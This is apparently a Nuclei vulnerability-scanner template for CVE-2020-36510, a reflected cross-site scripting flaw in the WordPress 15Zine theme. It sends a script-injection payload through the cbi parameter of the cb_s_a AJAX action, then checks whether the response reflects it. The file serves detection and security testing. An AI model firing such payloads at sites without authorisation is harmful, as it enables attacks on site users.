nuclei-templates/cves/2020/CVE-2020-36510.yaml

43 lines
1.2 KiB
YAML

id: CVE-2020-36510
info:
name: WordPress 15Zine <3.3.0 - Cross-Site Scripting
author: veshraj
severity: medium
description: |
WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
reference:
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
- https://nvd.nist.gov/vuln/detail/CVE-2020-36510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36510
cwe-id: CWE-79
metadata:
verified: false
tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/14